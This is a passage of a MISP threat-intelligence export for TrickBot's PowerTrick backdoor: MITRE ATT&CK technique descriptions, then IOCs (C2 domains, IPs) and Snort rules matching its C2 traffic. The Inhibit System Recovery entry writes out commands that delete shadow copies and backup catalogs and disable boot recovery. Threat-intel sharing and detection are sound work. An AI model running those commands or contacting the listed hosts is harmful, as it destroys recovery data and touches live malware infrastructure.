parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1074"]},"local":false},{"id":"890","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data from Local System - 
T1005","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data from Local System - T1005\"","description":"Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.\n\nAdversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https:\/\/attack.mitre.org\/techniques\/T1059), such as [cmd](https:\/\/attack.mitre.org\/software\/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https:\/\/attack.mitre.org\/techniques\/T1119) on the local system.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"3c4a2599-71ee-4405-ba1e-0e28414b4bc5","tag_id":"790","meta":{"external_id":["T1005"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1005"]},"local":false},{"id":"922","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data from Information Repositories - T1213","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data from Information Repositories - T1213\"","description":"Adversaries may leverage information repositories to mine valuable information. 
Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical \/ logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing \/ development credentials\n* Work \/ project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nSpecific common information repositories include:\n\n### Microsoft SharePoint\nFound in many enterprise networks and often used to store and share significant amounts of documentation.\n\n### Atlassian Confluence\nOften found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"d28ef391-8ed4-45dc-bc4a-2f43abf54416","tag_id":"791","meta":{"external_id":["T1213"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["Application logs","Authentication logs","Data loss prevention","Third-party application logs"],"mitre_platforms":["Linux","Windows","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1213","https:\/\/support.office.com\/en-us\/article\/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2","https:\/\/confluence.atlassian.com\/confkb\/how-to-enable-user-access-logging-182943.html"]},"local":false},{"id":"841","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data from Network Shared Drive - T1039","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data from Network Shared Drive 
- T1039\"","description":"Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration.\n\nAdversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https:\/\/attack.mitre.org\/software\/S0106) may be used to gather information.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"ae676644-d2d2-41b7-af7e-9bed1b55898c","tag_id":"792","meta":{"external_id":["T1039"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1039"]},"local":false},{"id":"1186","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Email Collection - T1114","tag_name":"misp-galaxy:mitre-attack-pattern=\"Email Collection - T1114\"","description":"Adversaries may target user email to collect sensitive information from a target.\n\nFiles containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.\n\nAdversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.\n\nSome adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"1608f3e1-598a-42f4-a01a-2e252e81728f","tag_id":"739","meta":{"external_id":["T1114"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["Authentication logs","File monitoring","Process monitoring","Process use of 
network"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1114"]},"local":false},{"id":"934","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Man in the Browser - T1185","tag_name":"misp-galaxy:mitre-attack-pattern=\"Man in the Browser - T1185\"","description":"Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)\n\nBrowser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. 
(Citation: cobaltstrike manual)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"544b0346-29ad-41e1-a808-501bb4193f47","tag_id":"793","meta":{"external_id":["T1185"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["Authentication logs","Packet capture","Process monitoring","API monitoring"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1185","https:\/\/cobaltstrike.com\/downloads\/csmanual38.pdf","https:\/\/en.wikipedia.org\/wiki\/Man-in-the-browser","https:\/\/www.cobaltstrike.com\/help-browser-pivoting","https:\/\/www.icebrg.io\/blog\/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses"]},"local":false},{"id":"1184","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Screen Capture - T1113","tag_name":"misp-galaxy:mitre-attack-pattern=\"Screen Capture - T1113\"","description":"Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.\n\n### Mac\n\nOn OSX, the native command screencapture<\/code> is used to capture screenshots.\n\n### Linux\n\nOn Linux, there is the native command xwd<\/code>. 
(Citation: Antiquated Mac Malware)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"0259baeb-9f63-4c69-bf10-eb038c390688","tag_id":"794","meta":{"external_id":["T1113"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["API monitoring","Process monitoring","File monitoring"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1113","https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/01\/new-mac-backdoor-using-antiquated-code\/"]},"local":false},{"id":"1135","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Connection Proxy - T1090","tag_name":"misp-galaxy:mitre-attack-pattern=\"Connection Proxy - T1090\"","description":"A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https:\/\/attack.mitre.org\/software\/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)\n\nThe definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.\n\nThe network may be within a single organization or across organizations with trust relationships. 
Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"731f4f55-b6d0-41d1-a7a9-072a66389aea","tag_id":"741","meta":{"external_id":["T1090"],"kill_chain":["mitre-attack:command-and-control"],"mitre_data_sources":["Process use of network","Process monitoring","Netflow\/Enclave netflow","Packet capture"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1090","https:\/\/arxiv.org\/ftp\/arxiv\/papers\/1408\/1408.1136.pdf","http:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/in-depth-look-apt-attack-tools-of-the-trade\/"]},"local":false},{"id":"844","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Custom Command and Control Protocol - T1094","tag_name":"misp-galaxy:mitre-attack-pattern=\"Custom Command and Control Protocol - T1094\"","description":"Adversaries may communicate using a custom command and control protocol instead of encapsulating commands\/data in an existing [Standard Application Layer Protocol](https:\/\/attack.mitre.org\/techniques\/T1071). 
Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP\/IP\/another standard network stack.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"f72eb8a8-cd4c-461d-a814-3f862befbf00","tag_id":"795","meta":{"external_id":["T1094"],"kill_chain":["mitre-attack:command-and-control"],"mitre_data_sources":["Packet capture","Netflow\/Enclave netflow","Process use of network","Process monitoring","Host network interface","Network intrusion detection system","Network protocol analysis"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1094","https:\/\/arxiv.org\/ftp\/arxiv\/papers\/1408\/1408.1136.pdf"]},"local":false},{"id":"1125","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data Obfuscation - T1001","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data Obfuscation - T1001\"","description":"Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. 
This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"ad255bfe-a9e6-4b52-a258-8d3462abe842","tag_id":"740","meta":{"external_id":["T1001"],"kill_chain":["mitre-attack:command-and-control"],"mitre_data_sources":["Packet capture","Process use of network","Process monitoring","Network protocol analysis"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1001","https:\/\/arxiv.org\/ftp\/arxiv\/papers\/1408\/1408.1136.pdf"]},"local":false},{"id":"1194","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data Encoding - T1132","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data Encoding - T1132\"","description":"Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems. 
(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f","tag_id":"796","meta":{"external_id":["T1132"],"kill_chain":["mitre-attack:command-and-control"],"mitre_data_sources":["Packet capture","Process use of network","Process monitoring","Network protocol analysis"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1132","https:\/\/en.wikipedia.org\/wiki\/Binary-to-text_encoding","https:\/\/en.wikipedia.org\/wiki\/Character_encoding","https:\/\/arxiv.org\/ftp\/arxiv\/papers\/1408\/1408.1136.pdf"]},"local":false},{"id":"1127","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Automated Exfiltration - T1020","tag_name":"misp-galaxy:mitre-attack-pattern=\"Automated Exfiltration - T1020\"","description":"Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [Scripting](https:\/\/attack.mitre.org\/techniques\/T1064) after being gathered during Collection. 
\n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https:\/\/attack.mitre.org\/techniques\/T1041) and [Exfiltration Over Alternative Protocol](https:\/\/attack.mitre.org\/techniques\/T1048).","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"774a3188-6ba9-4dc4-879d-d54ee48a5ce9","tag_id":"797","meta":{"external_id":["T1020"],"kill_chain":["mitre-attack:exfiltration"],"mitre_data_sources":["File monitoring","Process monitoring","Process use of network"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1020"]},"local":false},{"id":"798","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Exfiltration Over Command and Control Channel - T1041","tag_name":"misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Command and Control Channel - T1041\"","description":"Data exfiltration is performed over the Command and Control channel. 
Data is encoded into the normal communications channel using the same protocol as command and control communications.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"92d7da27-2d91-488e-a00c-059dc162766d","tag_id":"798","meta":{"external_id":["T1041"],"kill_chain":["mitre-attack:exfiltration"],"mitre_data_sources":["User interface","Process monitoring"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1041","https:\/\/arxiv.org\/ftp\/arxiv\/papers\/1408\/1408.1136.pdf"]},"local":false},{"id":"1015","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Inhibit System Recovery - T1490","tag_name":"misp-galaxy:mitre-attack-pattern=\"Inhibit System Recovery - T1490\"","description":"Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. 
Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https:\/\/attack.mitre.org\/techniques\/T1485) and [Data Encrypted for Impact](https:\/\/attack.mitre.org\/techniques\/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe<\/code> can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows \/all \/quiet<\/code>\n* [Windows Management Instrumentation](https:\/\/attack.mitre.org\/techniques\/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete<\/code>\n* wbadmin.exe<\/code> can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet<\/code>\n* bcdedit.exe<\/code> can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe \/set {default} bootstatuspolicy ignoreallfailures & bcdedit \/set {default} recoveryenabled no<\/code>","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a","tag_id":"799","meta":{"external_id":["T1490"],"kill_chain":["mitre-attack:impact"],"mitre_data_sources":["Windows Registry","Services","Windows event logs","Process command-line parameters","Process monitoring"],"mitre_platforms":["Windows","macOS","Linux"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1490","https:\/\/blog.talosintelligence.com\/2018\/02\/olympic-destroyer.html","https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/05\/wannacry-malware-profile.html"]},"local":false}]}],"Object":[],"Tag":[{"id":"714","name":"Banker: 
TrickBot","colour":"#930969","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"133","name":"PowerShell","colour":"#37192a","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"762","name":"PowerTrick","colour":"#000000","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"31","name":"misp-galaxy:malpedia=\"TrickBot\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"726","name":"misp-galaxy:mitre-attack-pattern=\"Spearphishing Link - T1192\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"727","name":"misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"763","name":"misp-galaxy:mitre-attack-pattern=\"Supply Chain Compromise - T1195\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"728","name":"misp-galaxy:mitre-attack-pattern=\"Command-Line Interface - T1059\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"764","name":"misp-galaxy:mitre-attack-pattern=\"PowerShell - T1086\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"765","name":"misp-galaxy:mitre-attack-pattern=\"Local Job Scheduling - T1168\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"766","name":"misp-galaxy:mitre-attack-pattern=\"Scheduled Task - T1053\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"729","name":"misp-galaxy:mitre-attack-pattern=\"Scripting - T1064\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"733","name":"misp-galaxy:mitre-attack-pattern=\"Hooking - 
T1179\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"767","name":"misp-galaxy:mitre-attack-pattern=\"Registry Run Keys \/ Startup Folder - T1060\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"731","name":"misp-galaxy:mitre-attack-pattern=\"Bypass User Account Control - T1088\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"768","name":"misp-galaxy:mitre-attack-pattern=\"Exploitation for Privilege Escalation - T1068\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"769","name":"misp-galaxy:mitre-attack-pattern=\"Disabling Security Tools - T1089\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"770","name":"misp-galaxy:mitre-attack-pattern=\"Exploitation for Defense Evasion - T1211\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"771","name":"misp-galaxy:mitre-attack-pattern=\"Obfuscated Files or Information - T1027\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"772","name":"misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"773","name":"misp-galaxy:mitre-attack-pattern=\"Regsvr32 - T1117\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"734","name":"misp-galaxy:mitre-attack-pattern=\"Credential Dumping - T1003\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"774","name":"misp-galaxy:mitre-attack-pattern=\"Domain Trust Discovery - T1482\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"735","name":"misp-galaxy:mitre-attack-pattern=\"Account 
Discovery - T1087\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"775","name":"misp-galaxy:mitre-attack-pattern=\"Network Service Scanning - T1046\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"776","name":"misp-galaxy:mitre-attack-pattern=\"Network Share Discovery - T1135\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"777","name":"misp-galaxy:mitre-attack-pattern=\"Password Policy Discovery - T1201\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"778","name":"misp-galaxy:mitre-attack-pattern=\"File and Directory Discovery - T1083\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"779","name":"misp-galaxy:mitre-attack-pattern=\"Process Discovery - T1057\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"780","name":"misp-galaxy:mitre-attack-pattern=\"Permission Groups Discovery - T1069\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"781","name":"misp-galaxy:mitre-attack-pattern=\"System Information Discovery - T1082\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"782","name":"misp-galaxy:mitre-attack-pattern=\"Security Software Discovery - T1063\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"783","name":"misp-galaxy:mitre-attack-pattern=\"System Service Discovery - T1007\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"784","name":"misp-galaxy:mitre-attack-pattern=\"Virtualization\/Sandbox Evasion - 
T1497\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"785","name":"misp-galaxy:mitre-attack-pattern=\"Logon Scripts - T1037\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"786","name":"misp-galaxy:mitre-attack-pattern=\"Pass the Ticket - T1097\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"787","name":"misp-galaxy:mitre-attack-pattern=\"Windows Admin Shares - T1077\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"788","name":"misp-galaxy:mitre-attack-pattern=\"Windows Remote Management - T1028\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"789","name":"misp-galaxy:mitre-attack-pattern=\"Automated Collection - T1119\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"737","name":"misp-galaxy:mitre-attack-pattern=\"Data Staged - T1074\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"790","name":"misp-galaxy:mitre-attack-pattern=\"Data from Local System - T1005\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"791","name":"misp-galaxy:mitre-attack-pattern=\"Data from Information Repositories - T1213\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"792","name":"misp-galaxy:mitre-attack-pattern=\"Data from Network Shared Drive - T1039\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"739","name":"misp-galaxy:mitre-attack-pattern=\"Email Collection - T1114\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"793","name":"misp-galaxy:mitre-attack-pattern=\"Man in the Browser - 
T1185\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"794","name":"misp-galaxy:mitre-attack-pattern=\"Screen Capture - T1113\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"741","name":"misp-galaxy:mitre-attack-pattern=\"Connection Proxy - T1090\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"795","name":"misp-galaxy:mitre-attack-pattern=\"Custom Command and Control Protocol - T1094\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"740","name":"misp-galaxy:mitre-attack-pattern=\"Data Obfuscation - T1001\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"796","name":"misp-galaxy:mitre-attack-pattern=\"Data Encoding - T1132\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"797","name":"misp-galaxy:mitre-attack-pattern=\"Automated Exfiltration - T1020\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"798","name":"misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Command and Control Channel - T1041\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null},{"id":"799","name":"misp-galaxy:mitre-attack-pattern=\"Inhibit System Recovery - T1490\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null}]}}]} 2 | 3 | -------------------------------------------------------------------------------- /IOCs/2020-01-08-powetrick-iocs-vk-misp-json.json .csv: -------------------------------------------------------------------------------- 1 | uuid,event_id,category,type,value,comment,to_ids,date,object_relation,attribute_tag,object_uuid,object_name,object_meta_category 2 | "5e15e7b0-dfe0-4f86-83de-2a9e19d2faa1",1295,"Payload 
delivery","domain","drive.staticcontent.kz","",1,1578493872,"","","","","" 3 | "5e15e7b0-e1dc-4635-b973-2a9e19d2faa1",1295,"Network activity","domain","web000aaa.info","",1,1578493872,"","","","","" 4 | "5e15e7b0-36c0-4ede-8b82-2a9e19d2faa1",1295,"Network activity","domain","traveldials.com","",1,1578493872,"","","","","" 5 | "5e15e7b0-3c94-4496-adb9-2a9e19d2faa1",1295,"Network activity","domain","northtracing.net","",1,1578493872,"","","","","" 6 | "5e15e7b0-7830-468a-a262-2a9e19d2faa1",1295,"Network activity","domain","magikorigin.me","",1,1578493872,"","","","","" 7 | "5e15e7b0-9ea0-42a5-a643-2a9e19d2faa1",1295,"Network activity","ip-dst","5.9.161.246","",1,1578493872,"","","","","" 8 | "5e15e7b1-3ef8-4abc-ae54-2a9e19d2faa1",1295,"Network activity","ip-dst","192.99.38.41","",1,1578493873,"","","","","" 9 | "5e15ed28-80e4-43e2-baa4-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick Task Request""; content:""POST""; http_method; content:""p=t&p1=""; offset:0; depth:7; http_client_body; classtype:trojan-activity; sid:9000019; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 10 | "5e15ed28-9d20-465c-b6d9-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick Task Checkin""; content:""POST""; http_method; content:""p3=""; offset:0; depth:3; http_client_body; content:""p=i""; http_client_body; content:""p1=""; http_client_body; content:""p2=""; http_client_body; content:""p9=""; http_client_body; classtype:trojan-activity; sid:9000020; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 11 | "5e15ed28-6c04-4d0a-a38a-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick Task Answer""; content:""POST""; http_method; content:""p3=""; offset:0; depth:3; http_client_body; content:""&p5=""; http_client_body; 
content:""&p=a&""; http_client_body; content:""&p1=""; http_client_body; content:""&p9=""; http_client_body; classtype:trojan-activity; sid:9000021; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 12 | "5e15ed28-2634-412d-bff7-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick Known Key 1""; content:""POST""; http_method; content:""p1=P4YCVQER8UWpfzxVFmVSDyBLzKL3yV6c""; http_client_body; classtype:trojan-activity; sid:9000022; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 13 | "5e15ed28-ce08-43f4-b248-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick Known Key 2""; content:""POST""; http_method; content:""p1=ybEsTxhqPuN4uVkemt6WjxaJN8jBdAGLxKeY9a4CnMTLSSq2""; http_client_body; classtype:trojan-activity; sid:9000026; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 14 | "5e15ed28-6060-43cd-9ea8-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick download ver1 bot""; content:""?x=UDRZQ1ZRRVI4VVdwZnp4VkZtVlNEeUJMektMM3lWNmM=&a=ips""; http_uri; classtype:trojan-activity; sid:9000023; rev:1; metadata:author Jason Reaves;)","Snort/Suricata IDS Rules",1,1578495272,"","","","","" 15 | "5e15ed28-2a94-49c8-9df5-2a9968f8e8cf",1295,"Network activity","snort","alert http $HOME_NET any -> $EXTERNAL_NET any (msg:""PowerTrick download ver2 bot""; content:""?a=irs&x=""; http_uri; classtype:trojan-activity; 